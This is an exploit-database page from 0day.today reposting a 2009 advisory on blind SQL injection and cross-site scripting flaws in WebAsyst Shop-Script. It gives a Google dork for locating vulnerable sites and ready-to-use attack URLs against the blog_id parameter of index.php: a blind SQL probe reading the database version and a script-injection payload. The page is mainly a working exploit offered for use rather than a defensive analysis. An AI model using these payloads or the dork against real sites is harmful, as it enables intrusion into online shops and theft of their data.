[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

WebAsyst Shop-Script (bSQL/XSS) Multiple Remote Vulnerabilities

Author
Vrs-hCk
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-5463
Category
web applications
Date add
08-07-2009
Platform
unsorted
===============================================================
WebAsyst Shop-Script (bSQL/XSS) Multiple Remote Vulnerabilities
===============================================================


 =============================================================================================

 Title    : (Blind SQL/XSS) Multiple Remote Vulnerabilities
 Software : WebAsyst Shop-Script
 Vendor   : http://www.webasyst.net
 
 Date     : 03 July 2009 (Indonesia)
 Author   : Vrs-hCk

 =============================================================================================

 [-] Google Dork

     "Powered by WebAsyst Shop-Script"

 [-] Vulnerable (Blind SQL/XSS)

     index.php

 [-] Exploit (Blind SQL)

     http://[site]/[path]/index.php?ukey=news&blog_id=null and substring(@@version,1,1)=null

 [-] Exploit (XSS)

     http://[site]/[path]/index.php?ukey=news&blog_id=<script>alert(123)</script>

 =============================================================================================




#  0day.today [2024-10-06]  #